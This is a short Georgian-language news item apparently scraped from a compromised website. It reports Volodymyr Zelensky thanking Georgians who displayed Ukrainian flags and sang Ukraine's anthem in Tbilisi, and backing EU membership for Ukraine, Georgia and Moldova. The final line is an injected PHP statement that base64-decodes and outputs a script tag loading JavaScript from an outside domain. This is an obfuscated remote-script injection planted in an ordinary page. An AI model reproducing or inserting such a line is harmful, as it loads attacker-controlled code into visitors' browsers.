celsiusi
ავერსი საქკაბელი
მინდა, მადლობა გადავუხადო ყველას, ვისაც ამ დღეებში საქართველოს მოედნებსა და ქუჩებში უკრაინის დროშები ეჭირა ხელში. მადლობას ვუხდი ყველას ჩვენი ეროვნული ჰიმნისთვის, რომელიც ისმოდა თბილისში, – ამის შესახებ უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ სოციალურ ქსელში გავრცელებულ ვიდეომიმართვაში განაცხადა.
ზელენსკის თქმით, ეს არის პატივისცემა უკრაინის მიმართ.
„გულწრფელ პატივისცემას გამოვხატავ საქართველოს მიმართ. არ არსებობს უკრაინელი, რომელსაც ჩვენი მეგობარი საქართველოს წარმატება არ სურს, დემოკრატიული წარმატება, ევროპული წარმატება. ჩვენ გვინდა, ვიყოთ ევროკავშირში და ვიქნებით. ჩვენ გვინდა, საქართველო იყოს ევროკავშირში და მე დარწმუნებული ვარ, იქნება. ჩვენ გვსურს, მოლდოვა იყოს ევროკავშირში და დარწმუნებული ვარ, იქნება. ამას იმსახურებს ევროპის ყველა თავისუფალი ერი“, – განაცხადა ვოლოდიმირ ზელენსკიმ. 
462
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");